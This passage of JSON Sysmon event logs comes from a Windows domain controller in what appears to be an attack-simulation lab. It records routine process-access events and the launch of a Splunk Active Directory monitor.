05:58:50.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7225,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7226,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7227,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7228,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7229,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7230,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7231,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.199\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-049A-5F25-0000-0010336A0F00}\r\nTargetProcessId: 3544\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.199","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-049A-5F25-0000-0010336A0F00}","TargetProcessId":"3544","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7232,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:50.950\r\nProcessGuid: {A837DB8D-049A-5F25-0000-00100E6C0F00}\r\nProcessId: 4836\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:58:50.950","ProcessGuid":"{A837DB8D-049A-5F25-0000-00100E6C0F00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
